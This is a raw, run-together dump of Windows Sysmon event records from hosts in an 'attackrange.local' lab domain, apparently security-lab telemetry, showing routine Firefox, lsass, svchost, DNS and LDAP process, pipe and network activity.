Firefox\firefox.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918188Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:45.251{896A638B-B5C8-6058-0B00-00000000AE01}6123756C:\Windows\system32\lsass.exe{896A638B-B434-605B-9169-00000000AE01}5604C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918187Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:45.226{896A638B-C9AE-6058-4C07-00000000AE01}34202880C:\Program Files\Mozilla Firefox\firefox.exe{896A638B-B434-605B-9169-00000000AE01}5604C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+41eae1|C:\Program Files\Mozilla Firefox\xul.dll+111f93e|C:\Program Files\Mozilla Firefox\xul.dll+11c0918|C:\Program Files\Mozilla Firefox\xul.dll+11f0589|C:\Program Files\Mozilla Firefox\xul.dll+2955334|C:\Program Files\Mozilla Firefox\xul.dll+11ccaab|C:\Program Files\Mozilla Firefox\xul.dll+1132aab|C:\Program Files\Mozilla Firefox\xul.dll+cb240b|C:\Program Files\Mozilla Firefox\xul.dll+41e78|C:\Program Files\Mozilla Firefox\xul.dll+113621f|C:\Program Files\Mozilla Firefox\xul.dll+110e84f|C:\Program Files\Mozilla Firefox\xul.dll+401be|C:\Program Files\Mozilla Firefox\xul.dll+3f8798|C:\Program Files\Mozilla Firefox\xul.dll+3f765f|C:\Program Files\Mozilla Firefox\xul.dll+39329aa|C:\Program Files\Mozilla Firefox\xul.dll+39cc055|C:\Program Files\Mozilla Firefox\xul.dll+39cd3a9|C:\Program Files\Mozilla Firefox\xul.dll+3f33|C:\Program Files\Mozilla Firefox\firefox.exe+1594|C:\Program Files\Mozilla Firefox\firefox.exe+4c248|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 18141800x80000000000000005918186Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-ConnectPipe2021-03-24 21:50:45.225{896A638B-C9AE-6058-4C07-00000000AE01}3420\cubeb-pipe-3420-20C:\Program Files\Mozilla Firefox\firefox.exe 17141700x80000000000000005918185Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-CreatePipe2021-03-24 21:50:45.225{896A638B-C9AE-6058-4C07-00000000AE01}3420\cubeb-pipe-3420-20C:\Program Files\Mozilla Firefox\firefox.exe 10341000x80000000000000005918184Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:45.215{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B434-605B-9169-00000000AE01}5604C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918183Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:45.213{896A638B-B5CB-6058-1600-00000000AE01}13081328C:\Windows\System32\svchost.exe{896A638B-B434-605B-9169-00000000AE01}5604C:\Program Files\Mozilla Firefox\firefox.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 18141800x80000000000000005918182Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-ConnectPipe2021-03-24 21:50:45.212{896A638B-C9AE-6058-4C07-00000000AE01}3420\chrome.3420.150.143220427C:\Program Files\Mozilla Firefox\firefox.exe 10341000x80000000000000005918181Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:45.211{896A638B-C9AE-6058-4C07-00000000AE01}34201564C:\Program Files\Mozilla Firefox\firefox.exe{896A638B-B434-605B-9169-00000000AE01}5604C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+2d0e1b|C:\Program Files\Mozilla Firefox\xul.dll+39b4b9d|C:\Windows\SYSTEM32\ntdll.dll+7f3fd|C:\Windows\SYSTEM32\ntdll.dll+3a890|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 18141800x80000000000000005918180Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-ConnectPipe2021-03-24 21:50:45.211{896A638B-C9AE-6058-4C07-00000000AE01}3420\gecko-crash-server-pipe.3420C:\Program Files\Mozilla Firefox\firefox.exe 10341000x80000000000000005918179Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:45.067{896A638B-B5C8-6058-0B00-00000000AE01}6123756C:\Windows\system32\lsass.exe{896A638B-B5C0-6058-0100-00000000AE01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+2b3f4|C:\Windows\system32\lsasrv.dll+30949|C:\Windows\system32\lsasrv.dll+2e2a7|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+15e0d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 354300x80000000000000005918322Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:44.484{896A638B-B5DB-6058-2700-00000000AE01}3020C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-792.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-792.attackrange.local50728- 23542300x80000000000000005918321Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:46.881{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8BE2AA421635B5241FD4BDD4FA997848,SHA256=6516B34857242EDFA27AAFD3D4F509275CEF023551592015C998C44260B08D54,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638653Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:46.335{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AA1154DA8A4CC6CAA1A36EF96B4543A9,SHA256=98B28753C8491C27F7C29528BC4A19ADC7B18AF56231A524E4FC5C8A16B40F93,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005918320Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:46.746{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918319Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:46.746{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 354300x80000000000000005918318Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:44.222{896A638B-B5DB-6058-2700-00000000AE01}3020C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-792.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-792.attackrange.local64267- 10341000x80000000000000005918317Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:46.517{896A638B-C9AE-6058-4C07-00000000AE01}34207004C:\Program Files\Mozilla Firefox\firefox.exe{896A638B-B436-605B-9269-00000000AE01}3732C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+41eae1|C:\Program Files\Mozilla Firefox\xul.dll+1108cf1|C:\Program Files\Mozilla Firefox\xul.dll+112513c|C:\Program Files\Mozilla Firefox\xul.dll+1231b37|C:\Program Files\Mozilla Firefox\xul.dll+222371|C:\Program Files\Mozilla Firefox\xul.dll+1132aab|C:\Program Files\Mozilla Firefox\xul.dll+41d97|C:\Program Files\Mozilla Firefox\xul.dll+403bd|C:\Program Files\Mozilla Firefox\xul.dll+110e84f|C:\Program Files\Mozilla Firefox\xul.dll+401be|C:\Program Files\Mozilla Firefox\xul.dll+cbe2e2|C:\Program Files\Mozilla Firefox\nss3.dll+f943a|C:\Program Files\Mozilla Firefox\nss3.dll+ecb31|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 18141800x80000000000000005918316Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-ConnectPipe2021-03-24 21:50:46.516{896A638B-C9AE-6058-4C07-00000000AE01}3420\chrome.3420.163.61286839C:\Program Files\Mozilla Firefox\firefox.exe 18141800x80000000000000005918315Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-ConnectPipe2021-03-24 21:50:46.516{896A638B-C9AE-6058-4C07-00000000AE01}3420\chrome.3420.162.59941942C:\Program Files\Mozilla Firefox\firefox.exe 18141800x80000000000000005918314Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-ConnectPipe2021-03-24 21:50:46.516{896A638B-C9AE-6058-4C07-00000000AE01}3420\chrome.3420.161.141786498C:\Program Files\Mozilla Firefox\firefox.exe 18141800x80000000000000005918313Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-ConnectPipe2021-03-24 21:50:46.516{896A638B-C9AE-6058-4C07-00000000AE01}3420\chrome.3420.160.207775747C:\Program Files\Mozilla Firefox\firefox.exe 18141800x80000000000000005918312Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-ConnectPipe2021-03-24 21:50:46.516{896A638B-C9AE-6058-4C07-00000000AE01}3420\chrome.3420.159.81332423C:\Program Files\Mozilla Firefox\firefox.exe 18141800x80000000000000005918311Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-ConnectPipe2021-03-24 21:50:46.515{896A638B-C9AE-6058-4C07-00000000AE01}3420\chrome.3420.158.172984673C:\Program Files\Mozilla Firefox\firefox.exe 10341000x80000000000000005918310Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:46.506{896A638B-B5CA-6058-1300-00000000AE01}3881712C:\Windows\system32\svchost.exe{896A638B-B436-605B-9269-00000000AE01}3732C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6c14|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918309Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:46.506{896A638B-B5CA-6058-1300-00000000AE01}3881712C:\Windows\system32\svchost.exe{896A638B-B436-605B-9269-00000000AE01}3732C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6c14|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 18141800x80000000000000005918308Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-ConnectPipe2021-03-24 21:50:46.497{896A638B-C9AE-6058-4C07-00000000AE01}3420\chrome.3732.2.199436221C:\Program Files\Mozilla Firefox\firefox.exe 17141700x80000000000000005918307Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-CreatePipe2021-03-24 21:50:46.497{896A638B-B436-605B-9269-00000000AE01}3732\chrome.3732.2.199436221C:\Program Files\Mozilla Firefox\firefox.exe 18141800x80000000000000005918306Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-ConnectPipe2021-03-24 21:50:46.497{896A638B-C9AE-6058-4C07-00000000AE01}3420\chrome.3732.1.16482976C:\Program Files\Mozilla Firefox\firefox.exe 17141700x80000000000000005918305Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-CreatePipe2021-03-24 21:50:46.497{896A638B-B436-605B-9269-00000000AE01}3732\chrome.3732.1.16482976C:\Program Files\Mozilla Firefox\firefox.exe 18141800x80000000000000005918304Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-ConnectPipe2021-03-24 21:50:46.497{896A638B-B436-605B-9269-00000000AE01}3732\chrome.3732.0.177281826C:\Program Files\Mozilla Firefox\firefox.exe 17141700x80000000000000005918303Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-CreatePipe2021-03-24 21:50:46.497{896A638B-B436-605B-9269-00000000AE01}3732\chrome.3732.0.177281826C:\Program Files\Mozilla Firefox\firefox.exe 10341000x80000000000000005918302Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:46.495{896A638B-B5C8-6058-0B00-00000000AE01}6123756C:\Windows\system32\lsass.exe{896A638B-B436-605B-9269-00000000AE01}3732C:\Program Files\Mozilla Firefox\firefox.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918301Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:46.495{896A638B-B5C8-6058-0B00-00000000AE01}6123756C:\Windows\system32\lsass.exe{896A638B-B436-605B-9269-00000000AE01}3732C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918300Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:46.471{896A638B-C9AE-6058-4C07-00000000AE01}34202880C:\Program Files\Mozilla Firefox\firefox.exe{896A638B-B436-605B-9269-00000000AE01}3732C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+41eae1|C:\Program Files\Mozilla Firefox\xul.dll+111f93e|C:\Program Files\Mozilla Firefox\xul.dll+11c0918|C:\Program Files\Mozilla Firefox\xul.dll+11f0589|C:\Program Files\Mozilla Firefox\xul.dll+2955334|C:\Program Files\Mozilla Firefox\xul.dll+11ccaab|C:\Program Files\Mozilla Firefox\xul.dll+1132aab|C:\Program Files\Mozilla Firefox\xul.dll+cb240b|C:\Program Files\Mozilla Firefox\xul.dll+41e78|C:\Program Files\Mozilla Firefox\xul.dll+113621f|C:\Program Files\Mozilla Firefox\xul.dll+110e84f|C:\Program Files\Mozilla Firefox\xul.dll+401be|C:\Program Files\Mozilla Firefox\xul.dll+3f8798|C:\Program Files\Mozilla Firefox\xul.dll+3f765f|C:\Program Files\Mozilla Firefox\xul.dll+39329aa|C:\Program Files\Mozilla Firefox\xul.dll+39cc055|C:\Program Files\Mozilla Firefox\xul.dll+39cd3a9|C:\Program Files\Mozilla Firefox\xul.dll+3f33|C:\Program Files\Mozilla Firefox\firefox.exe+1594|C:\Program Files\Mozilla Firefox\firefox.exe+4c248|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 18141800x80000000000000005918299Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-ConnectPipe2021-03-24 21:50:46.471{896A638B-C9AE-6058-4C07-00000000AE01}3420\cubeb-pipe-3420-21C:\Program Files\Mozilla Firefox\firefox.exe 17141700x80000000000000005918298Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-CreatePipe2021-03-24 21:50:46.471{896A638B-C9AE-6058-4C07-00000000AE01}3420\cubeb-pipe-3420-21C:\Program Files\Mozilla Firefox\firefox.exe 10341000x80000000000000005918297Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:46.460{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B436-605B-9269-00000000AE01}3732C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918296Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:46.459{896A638B-B5CB-6058-1600-00000000AE01}13081328C:\Windows\System32\svchost.exe{896A638B-B436-605B-9269-00000000AE01}3732C:\Program Files\Mozilla Firefox\firefox.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 18141800x80000000000000005918295Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-ConnectPipe2021-03-24 21:50:46.458{896A638B-C9AE-6058-4C07-00000000AE01}3420\chrome.3420.157.91746600C:\Program Files\Mozilla Firefox\firefox.exe 10341000x80000000000000005918294Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:46.456{896A638B-C9AE-6058-4C07-00000000AE01}34201564C:\Program Files\Mozilla Firefox\firefox.exe{896A638B-B436-605B-9269-00000000AE01}3732C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+2d0e1b|C:\Program Files\Mozilla Firefox\xul.dll+39b4b9d|C:\Windows\SYSTEM32\ntdll.dll+7f3fd|C:\Windows\SYSTEM32\ntdll.dll+3a890|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 18141800x80000000000000005918293Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-ConnectPipe2021-03-24 21:50:46.456{896A638B-C9AE-6058-4C07-00000000AE01}3420\gecko-crash-server-pipe.3420C:\Program Files\Mozilla Firefox\firefox.exe 354300x80000000000000005918292Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:44.039{896A638B-C9AE-6058-4C07-00000000AE01}3420C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-792.attackrange.local1028-false99.86.38.55server-99-86-38-55.sea19.r.cloudfront.net443https 354300x80000000000000005918291Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:44.003{896A638B-B5C8-6058-0B00-00000000AE01}612C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-792.attackrange.local1027-true0:0:0:0:0:0:0:1win-dc-792.attackrange.local389ldap 354300x80000000000000005918290Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:44.003{896A638B-B5DB-6058-2A00-00000000AE01}3044C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-792.attackrange.local1027-true0:0:0:0:0:0:0:1win-dc-792.attackrange.local389ldap 354300x80000000000000005918289Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:43.969{896A638B-B5DB-6058-2700-00000000AE01}3020C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-792.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-792.attackrange.local62352- 354300x80000000000000005918288Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:43.953{896A638B-B5DB-6058-2700-00000000AE01}3020C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-792.attackrange.local53domainfalse10.0.1.14win-dc-792.attackrange.local56766- 354300x80000000000000005918287Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:43.953{896A638B-B5DB-6058-2700-00000000AE01}3020C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-792.attackrange.local61429-false10.0.1.14win-dc-792.attackrange.local53domain 354300x80000000000000005918286Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:43.953{896A638B-B5DB-6058-2700-00000000AE01}3020C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-792.attackrange.local53domainfalse10.0.1.14win-dc-792.attackrange.local61429- 354300x80000000000000005918285Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:43.953{896A638B-B5DB-6058-2700-00000000AE01}3020C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruetruea00:10e:0:0:9890:924:8fad:ffff-61429-truea00:10e:0:0:0:0:0:0win-dc-792.attackrange.local53domain 